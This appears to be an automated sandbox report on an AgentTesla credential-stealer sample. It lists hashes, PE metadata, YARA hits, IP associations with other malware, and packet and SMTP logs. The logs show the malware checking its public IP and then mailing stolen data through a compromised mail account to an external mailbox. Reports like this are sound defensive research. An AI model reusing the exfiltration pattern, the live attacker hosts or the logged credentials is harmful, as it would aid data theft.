                                                Draft Sales contract.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUShttps://ortelia.com/download-ortelia-curator/Get hashmaliciousHavocBrowse
                                                • 1.1.1.1
                                                SecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205
                                                SecuriteInfo.com.Win64.CrypterX-gen.2144.26023.exeGet hashmaliciousGlupteba, PureLog Stealer, zgRATBrowse
                                                • 104.21.91.214
                                                http://ranchpools.comGet hashmaliciousUnknownBrowse
                                                • 104.19.178.52
                                                invoice & packing list.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                • 104.17.25.14
                                                SecuriteInfo.com.Heuristic.HEUR.AGEN.1343277.7061.14046.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.184.140
                                                https://windowdefalerts-error0x21906-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                • 172.67.176.240
                                                https://windowdefalerts-error0x21903-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                • 172.66.44.169
                                                https://windowdefalerts-error0x21905-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                • 104.21.56.41
                                                UNIFIEDLAYER-AS-1USSecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exeGet hashmaliciousAgentTeslaBrowse
                                                • 50.87.219.149
                                                invoice & packing list.exeGet hashmaliciousAgentTeslaBrowse
                                                • 162.241.123.30
                                                Draft Sales contract.exeGet hashmaliciousAgentTeslaBrowse
                                                • 162.241.123.30
                                                Bank slip.exeGet hashmaliciousAgentTeslaBrowse
                                                • 50.87.219.149
                                                https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FQuantexa/IpoXF42991IpoXF42991IpoXF/bWFzc2ltb2JvcnJlbGxpQHF1YW50ZXhhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                • 192.185.104.70
                                                QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                • 192.254.225.136
                                                PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                • 173.254.31.34
                                                draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • 192.185.13.234
                                                signed documents and BOL.exeGet hashmaliciousAgentTeslaBrowse
                                                • 162.241.123.30
                                                DN.exeGet hashmaliciousAgentTeslaBrowse
                                                • 50.87.253.239
                                                TUT-ASUSFizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                • 208.95.112.1
                                                QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.95.112.1
                                                PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                • 208.95.112.1
                                                dgxK76VlXC.exeGet hashmaliciousAsyncRAT, StormKitty, SugarDump, VenomRAT, XWorm, XenoRATBrowse
                                                • 208.95.112.1
                                                cByN4LhaIc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                invoice & packing list.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                ZG17uv37pi.exeGet hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                ZG17uv37pi.exeGet hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                http://mitchellind.ubpages.com/mi-ind/Get hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                SecuriteInfo.com.FileRepMalware.7644.21541.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                Draft Sales contract.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                Bank slip.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                No context
                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.895367615350729
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                File name:SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                                                File size:765'952 bytes
                                                MD5:149275db93dd2dab22f5dc0356a774fc
                                                SHA1:fd87ea7b7dc122528ca9efa769f4b404c49b0beb
                                                SHA256:dc275961e09616fcda47d2acee085f1742c22e9066465eda4a06672d2efffc8c
                                                SHA512:77fa5a9a8d27a99de9d3156c4d0bca59a1a2921be392c200b355d754f134d21fb86881a78cef84ead3375dc4833128b924b1a159a8b8ee2b09196debf04ca8c2
                                                SSDEEP:12288:pYhK/pbM0BjJlC+a+LMoUf0H+u4VH84v9htPW74hyik6tRKpad5rmWRwwAF7:ehiMYjnC++frVHx9h47T6t+Q5rmWg7
                                                TLSH:46F423313BE9AB22C8BA6FFD2524110093B678632071C74D5E52A1ED5D33B82DF1679B
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... f..............0..p...0........... ........@.. ....................................@................................
                                                Icon Hash:6dd4d6ccd6d0b24c
                                                Entrypoint:0x4b88ca
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6620800B [Thu Apr 18 02:06:03 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb88780x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x17d8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xb68d00xb7000a5fd95fadd8972c5df4f4f291ffab37aFalse0.9424521857923497data7.940688568978032IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xba0000x17d80x2000bf681575e6922f5db4acde5520a45cf8False0.608642578125data5.795914570126032IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xbc0000xc0x10002fbe0bbed952a278810eb6d157462cd4False0.0087890625data0.016408464515625623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xba0c80x139bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8963937039250847
                                                RT_GROUP_ICON0xbb4740x14data1.05
                                                RT_VERSION0xbb4980x33cdata0.42391304347826086
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                04/18/24-06:25:21.205154TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49725587192.168.2.6192.185.35.67
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 18, 2024 06:25:18.125818014 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.125864029 CEST44349722104.26.12.205192.168.2.6
                                                Apr 18, 2024 06:25:18.126058102 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.132252932 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.132265091 CEST44349722104.26.12.205192.168.2.6
                                                Apr 18, 2024 06:25:18.362853050 CEST44349722104.26.12.205192.168.2.6
                                                Apr 18, 2024 06:25:18.363795996 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.367799997 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.367811918 CEST44349722104.26.12.205192.168.2.6
                                                Apr 18, 2024 06:25:18.368192911 CEST44349722104.26.12.205192.168.2.6
                                                Apr 18, 2024 06:25:18.412142038 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.465646982 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.512120008 CEST44349722104.26.12.205192.168.2.6
                                                Apr 18, 2024 06:25:18.666862965 CEST44349722104.26.12.205192.168.2.6
                                                Apr 18, 2024 06:25:18.666939020 CEST44349722104.26.12.205192.168.2.6
                                                Apr 18, 2024 06:25:18.666999102 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.673842907 CEST49722443192.168.2.6104.26.12.205
                                                Apr 18, 2024 06:25:18.788935900 CEST4972380192.168.2.6208.95.112.1
                                                Apr 18, 2024 06:25:18.905680895 CEST8049723208.95.112.1192.168.2.6
                                                Apr 18, 2024 06:25:18.905760050 CEST4972380192.168.2.6208.95.112.1
                                                Apr 18, 2024 06:25:18.905898094 CEST4972380192.168.2.6208.95.112.1
                                                Apr 18, 2024 06:25:19.083885908 CEST8049723208.95.112.1192.168.2.6
                                                Apr 18, 2024 06:25:19.130923033 CEST4972380192.168.2.6208.95.112.1
                                                Apr 18, 2024 06:25:19.684050083 CEST4972380192.168.2.6208.95.112.1
                                                Apr 18, 2024 06:25:19.799732924 CEST8049723208.95.112.1192.168.2.6
                                                Apr 18, 2024 06:25:19.799823999 CEST4972380192.168.2.6208.95.112.1
                                                Apr 18, 2024 06:25:19.835375071 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:19.939380884 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:19.939599991 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:20.487732887 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:20.488121033 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:20.592389107 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:20.593264103 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:20.697653055 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:20.697899103 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:20.842432976 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:20.854774952 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:20.863420010 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:20.967483997 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:20.967504025 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:20.967694044 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:21.100379944 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:21.100558043 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:21.204540968 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:21.204654932 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:21.205153942 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:21.205246925 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:21.205246925 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:21.205317020 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:25:21.309237957 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:21.310003996 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:25:21.365572929 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:26:59.709253073 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:26:59.854465008 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:27:00.015031099 CEST58749725192.185.35.67192.168.2.6
                                                Apr 18, 2024 06:27:00.015181065 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:27:00.015249014 CEST49725587192.168.2.6192.185.35.67
                                                Apr 18, 2024 06:27:00.119163036 CEST58749725192.185.35.67192.168.2.6
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 18, 2024 06:25:18.016668081 CEST5441353192.168.2.61.1.1.1
                                                Apr 18, 2024 06:25:18.121041059 CEST53544131.1.1.1192.168.2.6
                                                Apr 18, 2024 06:25:18.681978941 CEST5362653192.168.2.61.1.1.1
                                                Apr 18, 2024 06:25:18.786716938 CEST53536261.1.1.1192.168.2.6
                                                Apr 18, 2024 06:25:19.684889078 CEST5100653192.168.2.61.1.1.1
                                                Apr 18, 2024 06:25:19.807080030 CEST53510061.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 18, 2024 06:25:18.016668081 CEST192.168.2.61.1.1.10x666fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Apr 18, 2024 06:25:18.681978941 CEST192.168.2.61.1.1.10x1e5aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                Apr 18, 2024 06:25:19.684889078 CEST192.168.2.61.1.1.10x754dStandard query (0)mail.nationalkham.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 18, 2024 06:25:18.121041059 CEST1.1.1.1192.168.2.60x666fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Apr 18, 2024 06:25:18.121041059 CEST1.1.1.1192.168.2.60x666fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Apr 18, 2024 06:25:18.121041059 CEST1.1.1.1192.168.2.60x666fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Apr 18, 2024 06:25:18.786716938 CEST1.1.1.1192.168.2.60x1e5aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                Apr 18, 2024 06:25:19.807080030 CEST1.1.1.1192.168.2.60x754dNo error (0)mail.nationalkham.com192.185.35.67A (IP address)IN (0x0001)false
                                                • api.ipify.org
                                                • ip-api.com
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649723208.95.112.1804868C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 18, 2024 06:25:18.905898094 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive
                                                Apr 18, 2024 06:25:19.083885908 CEST174INHTTP/1.1 200 OK
                                                Date: Thu, 18 Apr 2024 04:25:18 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 5
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 60
                                                X-Rl: 44
                                                Data Raw: 74 72 75 65 0a
                                                Data Ascii: true


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649722104.26.12.2054434868C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-18 04:25:18 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-04-18 04:25:18 UTC211INHTTP/1.1 200 OK
                                                Date: Thu, 18 Apr 2024 04:25:18 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8761e3e2df4d454e-ATL
                                                2024-04-18 04:25:18 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                Data Ascii: 81.181.57.52


                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Apr 18, 2024 06:25:20.487732887 CEST58749725192.185.35.67192.168.2.6220-gator4087.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 23:25:20 -0500
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Apr 18, 2024 06:25:20.488121033 CEST49725587192.168.2.6192.185.35.67EHLO 651689
                                                Apr 18, 2024 06:25:20.592389107 CEST58749725192.185.35.67192.168.2.6250-gator4087.hostgator.com Hello 651689 [81.181.57.52]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Apr 18, 2024 06:25:20.593264103 CEST49725587192.168.2.6192.185.35.67AUTH login c2FsZXNAbmF0aW9uYWxraGFtLmNvbQ==
                                                Apr 18, 2024 06:25:20.697653055 CEST58749725192.185.35.67192.168.2.6334 UGFzc3dvcmQ6
                                                Apr 18, 2024 06:25:20.854774952 CEST58749725192.185.35.67192.168.2.6235 Authentication succeeded
                                                Apr 18, 2024 06:25:20.863420010 CEST49725587192.168.2.6192.185.35.67MAIL FROM:<sales@nationalkham.com>
                                                Apr 18, 2024 06:25:20.967504025 CEST58749725192.185.35.67192.168.2.6250 OK
                                                Apr 18, 2024 06:25:20.967694044 CEST49725587192.168.2.6192.185.35.67RCPT TO:<newmankint@yandex.com>
                                                Apr 18, 2024 06:25:21.100379944 CEST58749725192.185.35.67192.168.2.6250 Accepted
                                                Apr 18, 2024 06:25:21.100558043 CEST49725587192.168.2.6192.185.35.67DATA
                                                Apr 18, 2024 06:25:21.204654932 CEST58749725192.185.35.67192.168.2.6354 Enter message, ending with "." on a line by itself
                                                Apr 18, 2024 06:25:21.205317020 CEST49725587192.168.2.6192.185.35.67.
                                                Apr 18, 2024 06:25:21.310003996 CEST58749725192.185.35.67192.168.2.6250 OK id=1rxJKr-001ctH-0S
                                                Apr 18, 2024 06:26:59.709253073 CEST49725587192.168.2.6192.185.35.67QUIT
                                                Apr 18, 2024 06:27:00.015031099 CEST58749725192.185.35.67192.168.2.6221 gator4087.hostgator.com closing connection

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:06:25:16
                                                Start date:18/04/2024
                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe"
                                                Imagebase:0x830000
                                                File size:765'952 bytes
                                                MD5 hash:149275DB93DD2DAB22F5DC0356A774FC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:06:25:17
                                                Start date:18/04/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                Imagebase:0xe10000
                                                File size:45'984 bytes
                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4630422433.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4630422433.0000000003205000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4630422433.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4630422433.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:9.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:328
                                                  Total number of Limit Nodes:14
